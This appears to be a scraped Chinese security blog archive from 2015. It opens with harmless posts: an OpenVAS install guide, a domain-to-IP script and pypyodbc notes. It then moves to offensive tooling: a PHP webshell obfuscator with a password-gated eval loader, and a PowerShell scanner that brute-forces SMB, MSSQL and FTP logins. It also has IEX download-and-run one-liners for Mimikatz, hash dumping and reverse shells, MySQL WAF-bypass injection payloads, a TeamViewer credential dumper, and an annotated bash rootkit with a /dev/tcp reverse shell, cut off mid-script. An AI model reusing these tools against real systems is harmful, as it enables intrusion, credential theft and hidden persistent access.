OpenVas 8 on Ubuntu Server 14.04

发布时间:July 10, 2015 // 分类:运维工作,工作日志,linux // No Comments

This installation is not made for public facing servers, there is no build in security in my setup.
Everything is run as root in this example below, including daemons and web servers…
I take no responsibility if this guide bork you server, burn your house down to ashes or just messes up your life.. It’s under the “it worked for me[tm]” clause

首先来安装各种支持库

sudo apt-get install -y build-essential devscripts dpatch libassuan-dev  libglib2.0-dev libgpgme11-dev libpcre3-dev libpth-dev libwrap0-dev libgmp-dev libgmp3-dev libgpgme11-dev libopenvas2 libpcre3-dev libpth-dev quilt cmake pkg-config  libssh-dev libglib2.0-dev libpcap-dev libgpgme11-dev uuid-dev bison libksba-dev  doxygen sqlfairy xmltoman sqlite3 libsqlite3-dev wamerican redis-server libhiredis-dev libsnmp-dev  libmicrohttpd-dev libxml2-dev libxslt1-dev xsltproc libssh2-1-dev libldap2-dev autoconf nmap libgnutls-dev libpopt-dev heimdal-dev heimdal-multidev libpopt-dev mingw32

# Fix redis-server for some openvas default install settings.

cp /etc/redis/redis.conf /etc/redis/redis.orig
echo "unixsocket /tmp/redis.sock" >> /etc/redis/redis.conf
service redis-server restart

# Move in to the right place to download some tarballs.

cd /usr/local/src

# Become almighty root (remember: safety off, segmented internal build on)

sudo su
# Download ‘all the things’
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2015/openvas-libraries-8.0.1.tar.gz 
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2016/openvas-scanner-5.0.1.tar.gz 
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2017/openvas-manager-6.0.1.tar.gz 
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2018/greenbone-security-assistant-6.0.1.tar.gz 
wget --no-check-certificate https://wald.intevation.org/frs/download.php/1987/openvas-cli-1.4.0.tar.gz 
wget --no-check-certificate https://wald.intevation.org/frs/download.php/1975/openvas-smb-1.0.1.tar.gz
wget --no-check-certificate https://wald.intevation.org/frs/download.php/1999/ospd-1.0.0.tar.gz
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2005/ospd-ancor-1.0.0.tar.gz
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2003/ospd-ovaldi-1.0.0.tar.gz
wget --no-check-certificate https://wald.intevation.org/frs/download.php/2004/ospd-w3af-1.0.0.tar.gz

# unpack

find . -name \*.gz -exec tar zxvfp {} \;

# Configure and install openvas-smb:

cd openvas-smb* 
mkdir build 
cd build/ 
cmake .. 
make 
make doc-full 
make install 
cd /usr/local/src

# config and build libraries

 cd openvas-libraries-* 
 mkdir build 
 cd build 
 cmake .. 
 make 
 make doc-full
 make install
 cd /usr/local/src

# config and build scanner

 cd openvas-scanner-* 
 mkdir build 
 cd build/ 
 cmake .. 
 make 
 make doc-full 
 make install 
 cd /usr/local/src

# reload libraries

ldconfig

#create cert

openvas-mkcert

# Sync nvt’s

openvas-nvt-sync

# Start openvassd

openvassd

# Check with ps or htop if the daemon is started. or perhaps..

# watch "ps -ef | grep openvassd"
root 32078 1 27 16:09 ? 00:00:36 openvassd: Reloaded 6550 of 34309 NVTs (19% / ETA: 09:10)
root 32079 32078 0 16:09 ? 00:00:00 openvassd (Loading Handler)
# Wait until "openvassd: Reloaded is done".. and switches to "Waiting for ingcoming..."

# config and build manager

cd openvas-manager-* 
mkdir build 
cd build/ 
cmake .. 
make 
make doc-full
make install
cd /usr/local/src

# get scap feed

openvas-scapdata-sync

# get cert feed

openvas-certdata-sync

# create client cert..

openvas-mkcert-client -n -i

# Initialize the Database

openvasmd --rebuild --progress
 (This is going to take some time, pehaps time to get coffee?)

#create user

openvasmd --create-user=admin --role=Admin
 (write down the password)

# config and build cli

cd openvas-cli-*
mkdir build
cd build/
cmake ..
make
make doc-full
make install
cd/usr/local/src

# configure and install gsa

cd greenbone-security-assistant-*
mkdir build
cd build/
cmake ..
make
make doc-full
make install
cd/usr/local/src

如果提示缺失libmicrohttpd,我们来安装

cd /var/tmp
wget http://ftpmirror.gnu.org/libmicrohttpd/libmicrohttpd-0.9.34.tar.gz
tar zxf libmicrohttpd-0.9.34.tar.gz
cd libmicrohttpd-*
./configure
make
makeinstall

然后重新继续上一步

# Start the all the stuff.

openvasmd --rebuild --progress 
openvasmd
gsad --http-only

# check installation

wget https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup --no-check-certificate
chmod 0755 openvas-check-setup
./openvas-check-setup --v8 --server

This should be a working default installation of OpenVas 8.
To try is out, go to http://serverip and login with Admin and your generated password.

# If you want to have pdf reports and such, you can always install:

apt-get install texlive-full
(this is not optimal thou, this installs a bunch of packets..)

# And some autostart script for ubuntu 14.04. and OpenVas8
# Nothing fancy, I took the init.d scripts from the debs for OpenVas5 and changed some stuff to make it work in the above setup.
# So all credits goes to the creators of the scripts that are mentioned in the scripts comments..
# This below downloads my modded init.d, default, logrotate.d scripts
# Unpack the tarball, copy the thingies to etc/
# Create the symlink to /var/log/openvas
# Create the symlinks for the autostart jobs..

cd /usr/local/src
wget http://www.mockel.se/wp-content/uploads/2015/04/openvas-startupscripts-v8.tar.gz
tar zxvfp openvas-startupscripts-v8.tar.gz
cd openvas-startupscripts-v8
cp etc/* /etc/ -arvi
update-rc.d openvas-manager defaults
update-rc.d openvas-scanner defaults
update-rc.d greenbone-security-assistant defaults

 

python 域名转IP

发布时间:July 2, 2015 // 分类:开发笔记,运维工作,工作日志,linux,代码学习,python,windows // No Comments

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import urlparse

def getIp(domain):
    trytime = 0
    while True:
         try:
            domain = domain.split(':')[0]
            myaddr = socket.getaddrinfo(domain,None)[0][4][0]
            return myaddr
         except:
            trytime+=1
            if trytime>3:
                return ""

if __name__=='__main__':
    www = "http://0cx.cc"
    hosts = urlparse.urlsplit(www)
    if ":" in hosts.netloc:
        host = hosts.netloc.split(":")[0]
        port = hosts.netloc.split(":")[1]
    else:
        host = hosts.netloc
        port = '80'
        print getIp(host)

 

最近在抓几个payload(java反序列的),准备拿socket来实现。暂时只能是模拟发包。

抓包工具 wireshark
在线python 沙盒 http://www.runoob.com/try/runcode.php?filename=HelloWorld&type=python

主要为了方便部分是有域名的。同时域名会转换为IP而准备的。一个从谷歌的搜索抓取结果的脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os,sys,requests,re
import pdb,urllib
from urllib import unquote
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
    'content-type': 'application/x-www-form-urlencoded',
    }
def google(domain):
    #domain ='site:0day5.com inurl:php'
    r =requests.get('https://www.google.com.hk/search?q='+domain+'&aqs=chrome..69i57j69i58.2444j0j9&sourceid=chrome&es_sm=91&ie=UTF-8&start=1&num=1000&',headers=headers)
    matc = re.findall('u=(.*?)&prev=search',r.content)
    #page = re.findall("<div id=\"resultStats\">(.*?)<nobr>",r.text)
    #print page
    for url in matc:
        print unquote(url)

if __name__=="__main__": 
      
    if len(sys.argv)!=2: 
        print "Usage:"+"python"+" test.py "+"keywords"
        print "example:"+"python test.py site:0day5.com"
        sys.exit() 
    else: 
        google(sys.argv[1])

一个svn的探测脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
r = requests.get('http://www.baidu.com/.svn/entries')
#print r.headers
get=r.text.split('\n')
dir=[get[i-1] for i in range(len(get)) if get[i]=='dir' and get[i-1]!='']
file=[get[i-1] for i in range(len(get)) if get[i]=='file' and get[i-1]!='']
print dir
print file

 

about pypyodbc

发布时间:June 26, 2015 // 分类:运维工作,工作日志,代码学习,linux,windows,python,转帖文章 // No Comments

Connect to a Database

Make a direct connection to a database and create a cursor.

cnxn = pypyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=testdb;UID=me;PWD=pass')
cursor = cnxn.cursor()

Make a connection using a DSN. Since DSNs usually don't store passwords, you'll probably need to provide the PWD keyword.

cnxn = pypyodbc.connect('DSN=test;PWD=password')
cursor = cnxn.cursor()

There are lots of options when connecting, so see the connect function and ConnectionStrings for more details.

Selecting Some Data

Select Basics

All SQL statements are executed using the cursor.execute function. If the statement returns rows, such as a select statement, 

you can retreive them using the Cursor fetch functions (fetchonefetchallfetchmany). If there are no rows, fetchone will return None; 

fetchall and fetchmany will both return empty lists.

cursor.execute("select user_id, user_name from users")
row = cursor.fetchone()
if row:
    print row

Row objects are similar to tuples, but they also allow access to columns by name:

cursor.execute("select user_id, user_name from users")
row = cursor.fetchone()
print 'name:', row[1]          # access by column index
print 'name:', row.user_name   # or access by name

The fetchone function returns None when all rows have been retrieved.

while 1:
    row = cursor.fetchone()
    if not row:
        break
    print 'id:', row.user_id

The fetchall function returns all remaining rows in a list. If there are no rows, an empty list is returned. 

(If there are a lot of rows, this will use a lot of memory. Unread rows are stored by the database driver in a compact format and are often sent in batches from the database server. 

Reading in only the rows you need at one time will save a lot of memory.)

cursor.execute("select user_id, user_name from users")
rows = cursor.fetchall()
for row in rows:
    print row.user_id, row.user_name

If you are going to process the rows one at a time, you can use the cursor itself as an interator:

cursor.execute("select user_id, user_name from users"):
for row in cursor:
    print row.user_id, row.user_name

Since cursor.execute always returns the cursor, you can simplify this even more:

for row in cursor.execute("select user_id, user_name from users"):
    print row.user_id, row.user_name

A lot of SQL statements don't fit on one line very easily, so you can always use triple quoted strings:

cursor.execute("""
               select user_id, user_name
                 from users
                where last_logon < '2001-01-01'
                  and bill_overdue = 'y'
               """)

Parameters

ODBC supports parameters using a question mark as a place holder in the SQL. 

You provide the values for the question marks by passing them after the SQL:

cursor.execute("""
               select user_id, user_name
                 from users
                where last_logon < ?
                  and bill_overdue = ?
               """, '2001-01-01', 'y')

This is safer than putting the values into the string because the parameters are passed to the database separately, protecting against SQL injection attacks

It is also be more efficient if you execute the same SQL repeatedly with different parameters. The SQL will be prepared only once. (pypyodbc only keeps the last statement prepared, so if you switch between statements, each will be prepared multiple times.)

The Python DB API specifies that parameters should be passed in a sequence, so this is also supported by pypyodbc:

cursor.execute("""
               select user_id, user_name
                 from users
                where last_logon < ?
                  and bill_overdue = ?
               """, ['2001-01-01', 'y'])
cursor.execute("select count(*) as user_count from users where age > ?", 21)
row = cursor.fetchone()
print '%d users' % row.user_count

Inserting Data

To insert data, pass the insert SQL to Cursor.execute, along with any parameters necessary:

cursor.execute("insert into products(id, name) values ('pypyodbc', 'awesome library')")
cnxn.commit()

cursor.execute("insert into products(id, name) values (?, ?)", 'pypyodbc', 'awesome library')
cnxn.commit()

Note the calls to cnxn.commit(). You must call commit or your changes will be lost! When the connection is closed, any pending changes will be rolled back. This makes error recovery very easy, but you must remember to call commit.

Updating and Deleting

Updating and deleting work the same way, pass the SQL to execute. However, you often want to know how many records were affected when updating and deleting, in which case you can use the cursor.rowcount value:

cursor.execute("delete from products where id <> ?", 'pypyodbc')
print cursor.rowcount, 'products deleted'
cnxn.commit()

Since execute always returns the cursor, you will sometimes see code like this. (Notice the rowcount on the end.)

deleted = cursor.execute("delete from products where id <> 'pypyodbc'").rowcount
cnxn.commit()

Note the calls to cnxn.commit(). You must call commit or your changes will be lost! When the connection is closed, any pending changes will be rolled back. This makes error recovery very easy, but you must remember to call commit.

Tips and Tricks

Since single quotes are valid in SQL, use double quotes to surround your SQL:

deleted = cursor.execute("delete from products where id <> 'pypyodbc'").rowcount

If you are using triple quotes, you can use either:

deleted = cursor.execute("""
                         delete
                           from products
                          where id <> 'pypyodbc'
                         """).rowcount

Some databases (e.g. SQL Server) do not generate column names for calculations, in which case you need to access the columns by index. You can also use the 'as' keyword to name columns (the "as user_count" in the SQL below).

row = cursor.execute("select count(*) as user_count from users").fetchone()
print '%s users' % row.user_count

If there is only 1 value you need, you can put the fetch of the row and the extraction of the first column all on one line:

count = cursor.execute("select count(*) from users").fetchone()[0]
print '%s users' % count

This will not work if the first column can be NULL! In that case, fetchone() will return None and you'll get a cryptic error about NoneType not supporting indexing. If there is a default value, often you can is ISNULL or coalesce to convert NULLs to default values directly in the SQL:

maxid = cursor.execute("select coalesce(max(id), 0) from users").fetchone()[0]

In this example, coalesce(max(id), 0) causes the selected value to be 0 if max(id) returns NULL.

If you're using MS Access 2007, there are some subtle differences in the connection string:

conn = pypyodbc.connect("Driver={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=<path to MDB or ACCDB>;")

Also, you need to use the square brackets notation if your column has spaces or nonstandard characters. I prefer an alias:
 

cursor.execute("SELECT Cust.[ZIP CODE] AS ZIPCODE FROM Cust")
for row in cursor:
        print row.ZIPCODE

Aboutt mysql

# using mysql odbc driver http://www.mysql.com/downloads/connector/odbc/
import pypyodbc
#connect to localhost
cnxn = pypyodbc.connect('Driver={MySQL ODBC 5.1 Driver};Server=127.0.0.1;Port=3306;Database=information_schema;User=root; Password=root;Option=3;')
cursor = cnxn.cursor()

#select all tables from all databases
cursor.execute("select t1.TABLE_SCHEMA field1,t1.TABLE_NAME field2  from `TABLES` t1;")
rows = cursor.fetchall()
for row in rows:
    print "%s.%s" % (row.field1,row.field2)

from:https://code.google.com/p/pyodbc/downloads/list

php 后门加密代码

发布时间:June 17, 2015 // 分类:运维工作,工作日志,PHP,linux,转帖文章,windows // No Comments

在某司5看到了一个加密文件求解密的。默默的谷歌到了

http://www.unphp.net/decode/f8d9b784c5812649b44b3cf623805bd9/

如果需要解密,可以参考

http://wiki.yobi.be/wiki/Forensics_on_Incident_3

根据这篇文章的算法写了个简单的文件加密,什么大马小马加密出来的效果一模一样。效果很吊,双层加密,可以防爆破

<?php 
$file = 'D:/Web/index.php'; /*要加密的文件*/
$pass = '123456'; /*登录密码*/

function enc($code,$pass) {
        $len  = strlen($code);
        for($i = 0; $i < $len; $i++) {
                $pass .= $code[$i];
                $code[$i] = chr((ord($code[$i]) + ord($pass[$i])) % 256);
        }
        $code = base64_encode($code);
        $temp = str_split($code,80);
        $newc = join("\r\n",$temp);
        return $newc;
}

$code = file_get_contents($file);
$code = base64_encode(' ?>'.$code.'<?php ');
$code = 'eval(base64_decode(\''.$code.'\'));exit;';
$code = gzdeflate($code);
$pass = md5($pass).substr(md5(strrev($pass)),0,strlen($pass));

$out  = base64_decode('PD9waHANCiR3cF9fd3AgPSAnYmFzZScgLiAoMzIgKiAyKSAuICdfZGUnIC4gJ2NvZGUnOw0KJHdwX193cCA9ICR3cF9fd3Aoc3RyX3JlcGxhY2UoYXJyYXkoIlxyIiwiXG4iKSwgYXJyYXkoJycsJycpLCAn').enc($code,$pass);
$out .= base64_decode('JykpOw0KJHdwX3dwID0gaXNzZXQoJF9QT1NUWyd3cF93cCddKSA/ICRfUE9TVFsnd3Bfd3AnXSA6IChpc3NldCgkX0NPT0tJRVsnd3Bfd3AnXSkgPyAkX0NPT0tJRVsnd3Bfd3AnXSA6IE5VTEwpOw0KaWYgKCR3cF93cCAhPT0gTlVMTCkgew0KICAgICR3cF93cCA9IG1kNSgkd3Bfd3ApIC4gc3Vic3RyKG1kNShzdHJyZXYoJHdwX3dwKSksIDAsIHN0cmxlbigkd3Bfd3ApKTsNCiAgICBmb3IgKCR3cF9fX3dwID0gMDsgJHdwX19fd3AgPCA=').strlen($code);
$out .= base64_decode('OyAkd3BfX193cCsrKSB7DQogICAgICAgICR3cF9fd3BbJHdwX19fd3BdID0gY2hyKChvcmQoJHdwX193cFskd3BfX193cF0pIC0gb3JkKCR3cF93cFskd3BfX193cF0pKSAlIDI1Nik7DQogICAgICAgICR3cF93cC49ICR3cF9fd3BbJHdwX19fd3BdOw0KICAgIH0NCiAgICBpZiAoJHdwX193cCA9IEBnemluZmxhdGUoJHdwX193cCkpIHsNCiAgICAgICAgaWYgKGlzc2V0KCRfUE9TVFsnd3Bfd3AnXSkpIEBzZXRjb29raWUoJ3dwX3dwJywgJF9QT1NUWyd3cF93cCddKTsNCiAgICAgICAgJHdwX19fd3AgPSBjcmVhdGVfZnVuY3Rpb24oJycsICR3cF9fd3ApOw0KICAgICAgICB1bnNldCgkd3BfX3dwLCAkd3Bfd3ApOw0KICAgICAgICAkd3BfX193cCgpOw0KICAgIH0NCn0gPz48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0id3Bfd3AiIHZhbHVlPSIiLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iJmd0OyIvPjwvZm9ybT4=');

echo '<pre>';
echo htmlspecialchars($out);
echo '</pre>';
?>

一句话把加密后的$_POST['wp_wp']改成$_GET['wp_wp'],连接加上参数?wp_wp=xxxxxx。即可

powershell学习笔记

发布时间:June 16, 2015 // 分类:运维工作,工作日志,代码学习,windows,转帖文章 // No Comments

1.前言

powershell 功能异常强大,需要.NET 2.0以上环境,不要第三方支持,白名单,轻松过杀软。

在win7/server 2008以后,powershell已被集成在系统当中

============================================

2.基础语法

有点和php一样呢。直接百度一个网站开始学习。。。

http://www.pstips.net/powershell-online-tutorials/

非常简单的学习了一些,来一个脑图:

另外需要说明的是如何加载ps脚本的问题:

方法1:powershell IEX (New-Object Net.WebClient).DownloadString('https://raxxxxx/xxx.ps1');

方法2: set-ExecutionPolicy RemoteSigned

Import-Module .\xxxxx.ps1 [导入模块]

================================

 

3.实例代码

学了不用等于白学,招了一个github 源码[https://github.com/samratashok/nishang/tree/master/Scan],

抄抄改改,写出一个端口扫描,并且支持ftp,smb和mssql爆破ps1脚本

代码:


function Port-Scan {
    [CmdletBinding()] Param(
        [parameter(Mandatory = $true, Position = 0)]
        [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
        [string]
        $StartAddress,

        [parameter(Mandatory = $true, Position = 1)]
        [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
        [string]
        $EndAddress,
        
        [string]
        $file,
        
        [int[]]
        $Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
        
        [int]
        $TimeOut = 100
    )  
    Begin {
    $ping = New-Object System.Net.Networkinformation.Ping
    }
    Process {
    
    #init Brute force SQL Server function
    $Connection = New-Object System.Data.SQLClient.SQLConnection

        
        
    $result=@()
    foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
        foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
        foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
            foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
            
            $ip="$a.$b.$c.$d"
            $pingStatus = $ping.Send($ip,$TimeOut)
            
            $openport=@()
            
            if($pingStatus.Status -eq "Success") {
                write-host "$ip is alive" -ForegroundColor red

                
            for($i = 1; $i -le $ports.Count;$i++) {
                    $port = $Ports[($i-1)]
                    $client = New-Object System.Net.Sockets.TcpClient
                    $beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
                    Start-Sleep -Milli $TimeOut
    
                    if($client.Connected) {                     
                        $openport += $port
                
                        write-host "$ip open $port" -ForegroundColor red     
                        "$ip open $port" | out-file -Append -filepath $file
                        }
                    
                    $client.Close()
                
                }
                
            $iphash=@{ip=$ip;ports=$openport}
            $result +=$iphash
            
            }
            }
        }
        }
    }
    
    foreach ($i in $result){
        foreach ($port in $i.ports){
            #brute smb
            $ip=$i.ip
            if($port -eq 445){
                Write-host "Brute Forcing smb Service on $ip...." -ForegroundColor Yellow
                $conf=Get-Content 'conf\smb.conf'
                foreach ($j in $conf){
                    $username=$j.Split(":")[0]
                    $password=$j.Split(":")[1]
                    
                    if (wmic /user:$username /password:$password /node:$ip process call create "") {
                        Write-Host "login smb to $ip with $username : $password is successful" -ForegroundColor green
                        "login smb to $ip with $username : $password is successful" | out-file -Append -filepath $file
                        break
                    }else{
                        Write-Host "login smb to $ip with $username : $password is fail"
                    }
                }
                
            }
            #brute mssql
            if($port -eq 1433){
                Write-host "Brute Forcing SQL Service on $ip...."  -ForegroundColor Yellow
                $conf=Get-Content 'conf\mssql.conf'
                foreach ($j in $conf){
                    $username=$j.Split(":")[0]
                    $password=$j.Split(":")[1]
                    $Connection.ConnectionString = "Data Source=$ip;Initial Catalog=Master;User Id=$username;Password=$password;"
                    Try
                    {
                        $Connection.Open()
                        $success = $true
                    }
                    Catch
                    {
                        $success = $false
                        Write-host "login mssql to $ip with $username : $password fail "
                    }
                    if($success -eq $true) 
                    {
                            Write-host "login mssql to $ip with $username : $Password  is successful" -ForegroundColor green
                            "login mssql to $ip with $username : $Password  is successful"| out-file -Append -filepath $file
                            Break
                    } 
                }
                
            }
            
            
            if($port -eq 21){
                Write-host "Brute Forcing ftp Service on $ip...."  -ForegroundColor Yellow
                $source = "ftp://" + $ip
    
                $conf=Get-Content 'conf\ftp.conf'
                foreach ($j in $conf){
                    Try 
                    {
                        $username=$j.Split(":")[0]
                        $password=$j.Split(":")[1]                
                        $ftpRequest = [System.Net.FtpWebRequest]::Create($source)
                        $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
                        $ftpRequest.Credentials = new-object System.Net.NetworkCredential($username, $password)
                        $result = $ftpRequest.GetResponse()
                        $message = $result.BannerMessage + $result.WelcomeMessage
                        Write-host "login ftp to $ip with $username : $password  is successful" -ForegroundColor green
                        "login ftp to $ip with $username : $password  is successful"| out-file -Append -filepath $file
                        break
                    }
                    Catch {
                    Write-host "login ftp to $ip with $username : $password fail "
                    }
                }
                

            }
            
            

        }
    }
    
    Write-host "put all into $file" -ForegroundColor red
    
    }
    
    
    
    
    End {
    }
}

效果:

bug:

1.代码是单线程的速度一定慢,不知道powershell要怎么去分配线程池

2.smb直接使用了wmic命令,当密码不对时候会显示一个错误,不知道如何去屏蔽不显示

代码没有没有进行服务指纹识别什么的,还是非常粗糙的

 

================================

4.一些很屌的powershell工具

4.1.获取hash

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

 

4.2.获取明文---Mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

 

4.3 nc---powercat

 

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

 

4.4----各种反弹shell

http:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PoshRatHttps.ps1')

tcp:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')

udp:

IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1')

icmp:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1')

 

来源:

https://github.com/samratashok/nishang

================================

 

5.结尾

资料来源:

https://github.com/samratashok/nishang/

http://x0day.me/

http://zone.wooyun.org/content/20429

通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

发布时间:June 16, 2015 // 分类:运维工作,工作日志,代码学习,转帖文章 // No Comments

直接上语法

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。

另外根据官方文档我们可以看到\N其实相当于NULL字符,利用这个特性可以绕过很多waf。

9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is \N (case sensitive).

获取运行中的TeamViewer的账号和密码

发布时间:June 10, 2015 // 分类:工作日志,运维工作,代码学习,VC/C/C++,转帖文章 // 1 Comment

Dumps TeamViewer ID,Password and account settings from a running TeamViewer instance by enumerating child windows.

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <iostream>
#pragma comment( lib, "kernel32" )
#pragma comment( lib, "user32" )
 
int status = 0;
 
BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)
        {
                status = 1;
                printf("TeamViewer ID: ");
        }
       
        if (strstr(BufferContent, "Please tell your partner") != NULL)
        {
                status = 1;
                printf("TeamViewer PASS: ");
        }
 
        return 1;
}
 
BOOL CALLBACK EnumAccountWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "E-mail") != NULL)
        {
                status = 1;
                printf("E-mail: ");
        }
       
        if (strstr(BufferContent, "Password") != NULL)
        {
                status = 1;
                printf("Password: ");
        }
 
        return 1;
}
 
 
int main()
{
        HWND hwndTeamViewer = FindWindow(NULL, "TeamViewer");
 
        if (hwndTeamViewer)
        {
                EnumChildWindows(hwndTeamViewer, EnumMainTVWindow, 0);
        }
       
       
        HWND hwndAccount = FindWindow(NULL, "Computers & Contacts");
 
        if (hwndAccount)
        {
                EnumChildWindows(hwndAccount, EnumAccountWindow, 0);
        }
 
       
        return 0;
}
C:\tools\Projects>TeamViewer_Dump.exe
TeamViewer ID: 606 151 261
TeamViewer PASS: 3239
E-mail: hacked@account.com
Password: FooPassword123

C:\tools\Projects>

brootkit: 一个shell脚本写的后门

发布时间:June 7, 2015 // 分类:运维工作,工作日志,linux,代码学习,转帖文章 // 1 Comment

今晚在吃饭呢, XX给我发来一条消息, 让我看看brootkit, 看看这个东西的兼容性怎样. 然后我把每个文件观察了一下, 发现它最核心的功能就是一个反弹shell, 利用了bash的可以创建tcp连接的特性. 其它的脚本除了brootkit.sh之外, 基本就是为了更加适合小白去使用而写的, 不过brootkit.sh的主要功能就是根据rootkit的配置文件隐藏这一整套的脚本和配置文件. 兼容性不怎样, 因为很可能没有bash这个程序.

打开连接看了一下描述, 是这样的, 它是一个bash脚本写的rootkit工具.

它可以做这些事情

more hidable ability against admintrator or hids.
su passwd thief.
hide file and directorys.
hide process.
hide network connections.
connect backdoor.
muilt thread port scanner.
http download.
好吧, 先checkout出来

MacOS:tmp cc$ svn co https://github.com/cloudsec/brootkit
A    brootkit/branches
A    brootkit/trunk
A    brootkit/trunk/.bdrc
A    brootkit/trunk/README
A    brootkit/trunk/README.md
A    brootkit/trunk/bashbd.sh
A    brootkit/trunk/br.conf
A    brootkit/trunk/br_config.sh
A    brootkit/trunk/brdaemon.sh
A    brootkit/trunk/brget.sh
A    brootkit/trunk/brootkit.sh
A    brootkit/trunk/brscan.sh
A    brootkit/trunk/install.sh
A    brootkit/trunk/uninstall.sh
Checked out revision 35.
MacOS:tmp cc$

可以看到, 有一个配置文件, 还有8个sh脚本, 根据README的描述, 应该是bash脚本

一个个脚本来看, 首先看bashbd.sh, 我给加上注释了

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

. $BR_ROOTKIT_PATH/br_config.sh

function br_connect_backdoor()
{
    local target_ip=$br_remote_host
    local target_port=$br_remote_port
    local sleep_time=$br_sleep_time

    while [ 1 ]
    do  
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
        {
        PS1='[\A j\j \u@\h:t\l \w]\$';export PS1
        exec 9<> /dev/tcp/$target_ip/$target_port # 这一步需要bash支持, 就是把9号文件描述符打开并重定向到某个ip的某个端口.
        [ $? -ne 0 ] && exit 0 || exec 0<&9;exec 1>&9 2>&1 # 检查文件描述符是否打开成功, 如果失败则退出, 否则把当前shell的标准输入和标准输出以及出错重定向到文件描述符
        if type python >/dev/null;then # 如果有python则用python去调用bash获取反弹shell
            export MAX_ROW_NUM MAX_COL_NUM
            python -c 'import pty; pty.spawn("/bin/bash")'
        else
            /bin/bash --rcfile $BR_ROOTKIT_PATH/.bdrc --noprofile -i # 如果没有python就执行bash, 其实这里是执行任意shell都可以的
        fi
        }&
        wait

        sleep $((RANDOM%sleep_time+sleep_time))
    done
}

br_load_config $BR_ROOTKIT_PATH/br.conf
br_connect_backdoor

从man手册可以知道那个rcfile选项的意思是这样的

--rcfile file
Execute commands from file instead of the standard personal initialization file ~/.bashrc if the shell is interactive (see INVOCATION below).

而那个.bdrc文件只是打印一个欢迎字符串而已

#!/bin/bash

echo -e "\033[31m\t\t\t\twelcome to brootkit\033[0m\033[32m"

br.conf里面定义了一些需要隐藏的文件和进程, 还有反弹shell的目标ip和端口

#brootkit config file.
#
HIDE_PORT       8080,8899
HIDE_FILE       br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
HIDE_PROC       bashbd,brootkit,pty.spawn,brdaemon
REMOTE_HOST     localhost
REMOTE_PORT     8080
SLEEP_TIME      60

看一下br_config.sh, 它定义了3个函数, 以及许多数组变量, 用来载入和显示配置文件的参数的

#!/bin/bash

declare -a br_hide_port
declare -a br_hide_file
declare -a br_hide_proc
declare -a br_remote_host
declare -a br_remote_port
declare br_sleep_time

function br_load_config()
{
        local arg1 arg2 line

